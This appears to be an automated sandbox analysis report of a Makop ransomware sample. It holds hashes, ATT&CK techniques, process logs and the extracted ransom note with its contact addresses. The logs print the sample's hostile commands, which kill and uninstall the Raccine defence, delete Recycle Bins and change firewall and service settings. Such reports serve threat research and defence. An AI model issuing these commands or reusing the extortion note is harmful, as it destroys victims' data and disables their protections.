makop | 2481bcb7380b038e84a6052a3cc42fab8e791cf1dffaefe783398a843af68c22

Analysis

max time kernel
38s
max time network
152s
platform
windows10_x64
resource
win10v20210410
submitted
28-05-2021 09:57

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe
Size

107KB
MD5

ffd507c308ffa09e21aa937bc631421a
SHA1

7938ce37df604cf807e9d2767acf33984a1776a3
SHA256

714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409
SHA512

b48721c1e57152afe16576e7f54084e52d88d594c12203e5e56316bca8a7bc44c29b790e2e358ab0b7220b2d6e098a288b0fa602af84dda9cef16104f72d2970

Score

10^/10

makop discovery evasion ransomware

Malware Config

Extracted

Path

C:\Users\Admin\AppData\Local\Temp\RESTORE_FILES_INFO.txt

Family

makop

Ransom Note

::: Greetings ::: Little FAQ: .1. Q: Whats Happen? A: Your files have been encrypted. The file structure was not damaged, we did everything possible so that this could not happen. .2. Q: How to recover files? A: If you wish to decrypt your files you will need to pay in Bitcoins. .3. Q: What about guarantees? A: Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will cooperate with us. Its not in our interests. To check the ability of returning files, you can send to us any 2 files with SIMPLE extensions(jpg,xls,doc, etc... not databases!) and low sizes(max 1 mb), we will decrypt them and send back to you. That is our guarantee. .4. Q: How to contact with you? A: Please, write us to our qTOX account: 7BDD546F7524089A930B12F793F4C1D1B4470A15A4CBA85AA0DA6D030AFE2E48B8799204F004 You can learn about this way of communication and download it here: https://qtox.github.io/ Or use Bitmessage and write to our address: BM-2cUbGd124Dcs1Jdc5VfSa2GDMC1iaNTesC You can learn about this way of communication and download it here: https://wiki.bitmessage.org/ and here: https://github.com/Bitmessage/PyBitmessage/releases/ .5. Q: How will the decryption process proceed after payment? A: After payment we will send to you our scanner-decoder program and detailed instructions for use. With this program you will be able to decrypt all your encrypted files. .6. Q: If I don’t want to pay bad people like you? A: If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause only we have the private key. In practice - time is much more valuable than money. :::BEWARE::: DON'T try to change encrypted files by yourself! If you will try to use any third party software for restoring your data or antivirus solutions - please make a backup for all encrypted files! Any changes in encrypted files may entail damage of the private key and, as result, the loss all data. Key Identifier: m95+iwjPW3df+Q5Af9nNgODdSnq45sS4gC3xS6DqdYcMtPchvhm/id0X/o+JThF0aLSP5jEAmrAU1fXkXVZZe7Z8Mi1rLjnzYrLQuy+kZnncD5oKVWlKetzCXAOmbmL8hjhBB9Tv+fIalOwDQI774GjcL1pUbPUw9MVCTyKAxo4VWSV6r9cBzKfyrbUjWynh1ev3iXytcuF6sAddzQRCMCZAw7mZWavQ5XUPH9OAvVJPDjlASNKvN5tqhQL/tlssT2jJ5cIqWwVIqH+pin8AKYNDJluRHzQxIe70WnrQUkZtIhsAPCNgoM8GesBXDErOk/8w1OgKKQuBKuwgOj0vA1QEyab0wZVwLF5JYrFHZH6fsxiqjaEugwPrRLSXNmdm9MRdtxv228xgEl3ZaoPKR+mpyiLFwjgh7dhgY/kbk2Fgdvk2X4nJrYycU3x5pfDbQlsjT4jD6a4glEOHj3CQhQn0O+xb0W0co1BVgt+xTXtELPR7LLRF+wanDF234v1Qnrnro2AYOqJX9rwgLSuUM1VMorNS6jsgi2N+f/zVFwp9jaTo635cJ9qg2///SBuZr5hCcOgxBHE0sBkrwv3D1nYZRotzOHtAV9Pt/aDdvrDxMFRJUWNZHtEc1pnjzHC2y5/F0H4WnMSncGdGRTj6dNAa6w3bLsWb5bT1WBvpQzQ= PC Hardware ID: A2C56C1C

Signatures

Makop
Ransomware family discovered by @VK_Intel in early 2020.
ransomware makop
Downloads MZ/PE file
Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031

Drops startup file 1 IoCs

Processes:

714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mystartup.lnk	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe

Modifies file permissions 1 TTPs 6 IoCs
discovery

File Permissions Modification
T1222

Processes:

icacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exe

pid process

2416 icacls.exe
2648 icacls.exe
3720 icacls.exe
3400 icacls.exe
3372 icacls.exe
4240 icacls.exe

pid	process
2416	icacls.exe
2648	icacls.exe
3720	icacls.exe
3400	icacls.exe
3372	icacls.exe
4240	icacls.exe

Drops file in Windows directory 10 IoCs

Processes:

714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe

description	ioc	process
File opened for modification	C:\Windows\setupact.log.[ID-A2C56C1C].9ten0p	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe
File opened for modification	C:\Windows\WindowsShell.Manifest	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe
File opened for modification	C:\Windows\WindowsUpdate.log.[ID-A2C56C1C].9ten0p	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe
File created	C:\Windows\bootstat.dat.[ID-A2C56C1C].9ten0p	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe
File opened for modification	C:\Windows\DtcInstall.log.[ID-A2C56C1C].9ten0p	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe
File opened for modification	C:\Windows\lsasetup.log.[ID-A2C56C1C].9ten0p	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe
File opened for modification	C:\Windows\PFRO.log.[ID-A2C56C1C].9ten0p	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe
File opened for modification	C:\Windows\Professional.xml.[ID-A2C56C1C].9ten0p	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe
File opened for modification	C:\Windows\system.ini.[ID-A2C56C1C].9ten0p	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe
File opened for modification	C:\Windows\win.ini.[ID-A2C56C1C].9ten0p	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Kills process with taskkill 64 IoCs

evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid	process
3136	taskkill.exe
4424	taskkill.exe
6124	taskkill.exe
6020	taskkill.exe
6108	taskkill.exe
5172	taskkill.exe
3904	taskkill.exe
3576	taskkill.exe
3944	taskkill.exe
1768	taskkill.exe
5336	taskkill.exe
4952	taskkill.exe
4764	taskkill.exe
3936	taskkill.exe
1192	taskkill.exe
4888	taskkill.exe
4532	taskkill.exe
3636	taskkill.exe
3876	taskkill.exe
3044	taskkill.exe
4856	taskkill.exe
5316	taskkill.exe
2168	taskkill.exe
3828	taskkill.exe
1580	taskkill.exe
5520	taskkill.exe
5772	taskkill.exe
5532	taskkill.exe
1520	taskkill.exe
1280	taskkill.exe
2268	taskkill.exe
384	taskkill.exe
5460	taskkill.exe
5372	taskkill.exe
800	taskkill.exe
2152	taskkill.exe
5444	taskkill.exe
4232	taskkill.exe
3332	taskkill.exe
3932	taskkill.exe
3936	taskkill.exe
4960	taskkill.exe
5400	taskkill.exe
5824	taskkill.exe
4976	taskkill.exe
2136	taskkill.exe
3968	taskkill.exe
3196	taskkill.exe
2784	taskkill.exe
3480	taskkill.exe
5612	taskkill.exe
4896	taskkill.exe
3868	taskkill.exe
6092	taskkill.exe
5436	taskkill.exe
4264	taskkill.exe
1652	taskkill.exe
3196	taskkill.exe
2208	taskkill.exe
1232	taskkill.exe
4504	taskkill.exe
5592	taskkill.exe
5652	taskkill.exe
4008	taskkill.exe

Modifies registry key 1 TTPs 2 IoCs

Modify Registry
T1112

Processes:

reg.exereg.exe

pid process

3332 reg.exe
5776 reg.exe
Runs net.exe

pid	process
3332	reg.exe
5776	reg.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe

pid	process
1744	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe
1744	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe
1744	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe
1744	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe
1744	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe
1744	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe
1744	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe
1744	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe
1744	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe
1744	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe
1744	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe
1744	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe
1744	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe
1744	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe
1744	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe
1744	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe
1744	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe
1744	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe
1744	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe
1744	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe
1744	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe
1744	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe
1744	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe
1744	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe
1744	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe
1744	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe
1744	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe
1744	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe
1744	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe
1744	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe
1744	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe
1744	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe
1744	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe
1744	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe
1744	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe
1744	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe
1744	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe
1744	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe
1744	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe
1744	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe
1744	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe
1744	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe
1744	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe
1744	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe
1744	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe
1744	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe
1744	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe
1744	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe
1744	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe
1744	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe
1744	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe
1744	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe
1744	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe
1744	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe
1744	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe
1744	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe
1744	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe
1744	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe
1744	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe
1744	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe
1744	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe
1744	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe
1744	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe
1744	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe

Suspicious use of AdjustPrivilegeToken 49 IoCs

Processes:

714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exenet.exetaskkill.exeConhost.exetaskkill.exeConhost.exeConhost.exeConhost.exewmiprvse.exetaskkill.exeConhost.exetaskkill.exeConhost.exenet.exetaskkill.exeConhost.exenet.exenet.exenet.exeConhost.exenet.exeSLUI.exetaskkill.exeConhost.exetaskkill.exetaskkill.exeConhost.exetaskkill.exetaskkill.exeConhost.exenet.exetaskkill.exeConhost.exenet.exenet.exeConhost.exetaskkill.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	1744	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe
Token: SeDebugPrivilege	1432	taskkill.exe
Token: SeDebugPrivilege	3636	taskkill.exe
Token: SeDebugPrivilege	1280	taskkill.exe
Token: SeDebugPrivilege	3936	taskkill.exe
Token: SeDebugPrivilege	3172	taskkill.exe
Token: SeDebugPrivilege	2136	net.exe
Token: SeDebugPrivilege	2168	taskkill.exe
Token: SeDebugPrivilege	1652	Conhost.exe
Token: SeDebugPrivilege	3860	taskkill.exe
Token: SeDebugPrivilege	3904	Conhost.exe
Token: SeDebugPrivilege	3968	Conhost.exe
Token: SeDebugPrivilege	3196	Conhost.exe
Token: SeDebugPrivilege	1232	wmiprvse.exe
Token: SeDebugPrivilege	740	taskkill.exe
Token: SeDebugPrivilege	3964	Conhost.exe
Token: SeDebugPrivilege	1092	taskkill.exe
Token: SeDebugPrivilege	3332	Conhost.exe
Token: SeDebugPrivilege	2836	net.exe
Token: SeDebugPrivilege	1840	taskkill.exe
Token: SeDebugPrivilege	4008	Conhost.exe
Token: SeDebugPrivilege	3136	net.exe
Token: SeDebugPrivilege	3576	net.exe
Token: SeDebugPrivilege	3196	Conhost.exe
Token: SeDebugPrivilege	2100	net.exe
Token: SeDebugPrivilege	3932	Conhost.exe
Token: SeDebugPrivilege	2736	net.exe
Token: SeDebugPrivilege	3828	SLUI.exe
Token: SeDebugPrivilege	3480	taskkill.exe
Token: SeDebugPrivilege	3944	Conhost.exe
Token: SeDebugPrivilege	3928	taskkill.exe
Token: SeDebugPrivilege	3936	taskkill.exe
Token: SeDebugPrivilege	2208	taskkill.exe
Token: SeDebugPrivilege	1192	Conhost.exe
Token: SeDebugPrivilege	2152	taskkill.exe
Token: SeDebugPrivilege	1232	wmiprvse.exe
Token: SeDebugPrivilege	3876	taskkill.exe
Token: SeDebugPrivilege	1792	Conhost.exe
Token: SeDebugPrivilege	2268	net.exe
Token: SeDebugPrivilege	384	taskkill.exe
Token: SeDebugPrivilege	3944	Conhost.exe
Token: SeDebugPrivilege	3480	taskkill.exe
Token: SeDebugPrivilege	2700	Conhost.exe
Token: SeDebugPrivilege	2712	net.exe
Token: SeDebugPrivilege	1580	net.exe
Token: SeDebugPrivilege	3044	Conhost.exe
Token: SeDebugPrivilege	1768	taskkill.exe
Token: SeDebugPrivilege	1652	Conhost.exe
Token: SeDebugPrivilege	1076	powershell.exe

Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe

pid process

1744 714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe
Suspicious use of SendNotifyMessage 1 IoCs

Processes:

714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe

pid process

1744 714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe

description	pid	process	target process
PID 1744 wrote to memory of 1432	1744	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe	taskkill.exe
PID 1744 wrote to memory of 1432	1744	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe	taskkill.exe
PID 1744 wrote to memory of 1432	1744	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe	taskkill.exe
PID 1744 wrote to memory of 3480	1744	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe	reg.exe
PID 1744 wrote to memory of 3480	1744	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe	reg.exe
PID 1744 wrote to memory of 3480	1744	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe	reg.exe
PID 1744 wrote to memory of 3332	1744	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe	reg.exe
PID 1744 wrote to memory of 3332	1744	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe	reg.exe
PID 1744 wrote to memory of 3332	1744	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe	reg.exe
PID 1744 wrote to memory of 3132	1744	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe	schtasks.exe
PID 1744 wrote to memory of 3132	1744	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe	schtasks.exe
PID 1744 wrote to memory of 3132	1744	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe	schtasks.exe
PID 1744 wrote to memory of 4040	1744	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe	cmd.exe
PID 1744 wrote to memory of 4040	1744	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe	cmd.exe
PID 1744 wrote to memory of 4040	1744	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe	cmd.exe
PID 1744 wrote to memory of 424	1744	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe	netsh.exe
PID 1744 wrote to memory of 424	1744	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe	netsh.exe
PID 1744 wrote to memory of 424	1744	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe	netsh.exe
PID 1744 wrote to memory of 3872	1744	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe	Conhost.exe
PID 1744 wrote to memory of 3872	1744	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe	Conhost.exe
PID 1744 wrote to memory of 3872	1744	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe	Conhost.exe
PID 1744 wrote to memory of 1768	1744	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe	Conhost.exe
PID 1744 wrote to memory of 1768	1744	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe	Conhost.exe
PID 1744 wrote to memory of 1768	1744	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe	Conhost.exe
PID 1744 wrote to memory of 1956	1744	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe	Conhost.exe
PID 1744 wrote to memory of 1956	1744	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe	Conhost.exe
PID 1744 wrote to memory of 1956	1744	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe	Conhost.exe
PID 1744 wrote to memory of 2452	1744	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe	cmd.exe
PID 1744 wrote to memory of 2452	1744	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe	cmd.exe
PID 1744 wrote to memory of 2452	1744	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe	cmd.exe
PID 1744 wrote to memory of 1348	1744	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe	sc.exe
PID 1744 wrote to memory of 1348	1744	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe	sc.exe
PID 1744 wrote to memory of 1348	1744	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe	sc.exe
PID 1744 wrote to memory of 804	1744	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe	sc.exe
PID 1744 wrote to memory of 804	1744	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe	sc.exe
PID 1744 wrote to memory of 804	1744	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe	sc.exe
PID 1744 wrote to memory of 3860	1744	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe	taskkill.exe
PID 1744 wrote to memory of 3860	1744	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe	taskkill.exe
PID 1744 wrote to memory of 3860	1744	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe	taskkill.exe
PID 1744 wrote to memory of 2704	1744	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe	netsh.exe
PID 1744 wrote to memory of 2704	1744	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe	netsh.exe
PID 1744 wrote to memory of 2704	1744	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe	netsh.exe
PID 1744 wrote to memory of 3904	1744	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe	Conhost.exe
PID 1744 wrote to memory of 3904	1744	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe	Conhost.exe
PID 1744 wrote to memory of 3904	1744	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe	Conhost.exe
PID 1744 wrote to memory of 3972	1744	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe	Conhost.exe
PID 1744 wrote to memory of 3972	1744	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe	Conhost.exe
PID 1744 wrote to memory of 3972	1744	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe	Conhost.exe
PID 1744 wrote to memory of 3636	1744	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe	taskkill.exe
PID 1744 wrote to memory of 3636	1744	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe	taskkill.exe
PID 1744 wrote to memory of 3636	1744	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe	taskkill.exe
PID 1744 wrote to memory of 1280	1744	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe	taskkill.exe
PID 1744 wrote to memory of 1280	1744	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe	taskkill.exe
PID 1744 wrote to memory of 1280	1744	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe	taskkill.exe
PID 1744 wrote to memory of 3936	1744	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe	taskkill.exe
PID 1744 wrote to memory of 3936	1744	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe	taskkill.exe
PID 1744 wrote to memory of 3936	1744	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe	taskkill.exe
PID 1744 wrote to memory of 3172	1744	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe	taskkill.exe
PID 1744 wrote to memory of 3172	1744	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe	taskkill.exe
PID 1744 wrote to memory of 3172	1744	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe	taskkill.exe
PID 1744 wrote to memory of 2136	1744	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe	taskkill.exe
PID 1744 wrote to memory of 2136	1744	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe	taskkill.exe
PID 1744 wrote to memory of 2136	1744	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe	taskkill.exe
PID 1744 wrote to memory of 2168	1744	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe	taskkill.exe

C:\Users\Admin\AppData\Local\Temp\714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe
"C:\Users\Admin\AppData\Local\Temp\714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe"
1⤵
- Drops startup file
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1744

C:\Windows\SysWOW64\taskkill.exe
"taskkill" /F /IM RaccineSettings.exe
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1432

C:\Windows\SysWOW64\reg.exe
"reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F
2⤵
PID:3480

C:\Windows\SysWOW64\reg.exe
"reg" delete HKCU\Software\Raccine /F
2⤵
- Modifies registry key
PID:3332

C:\Windows\SysWOW64\schtasks.exe
"schtasks" /DELETE /TN "Raccine Rules Updater" /F
2⤵
PID:3132

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin
2⤵
PID:4040

C:\Windows\SysWOW64\netsh.exe
"netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
2⤵
PID:424

C:\Windows\SysWOW64\sc.exe
"sc.exe" config Dnscache start= auto
2⤵
PID:3872

C:\Windows\SysWOW64\sc.exe
"sc.exe" config SQLTELEMETRY start= disabled
2⤵
PID:1956

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c rd /s /q D:\\$Recycle.bin
2⤵
PID:2452

C:\Windows\SysWOW64\sc.exe
"sc.exe" config SSDPSRV start= auto
2⤵
PID:1348

C:\Windows\SysWOW64\sc.exe
"sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
2⤵
PID:804

C:\Windows\SysWOW64\sc.exe
"sc.exe" config SstpSvc start= disabled
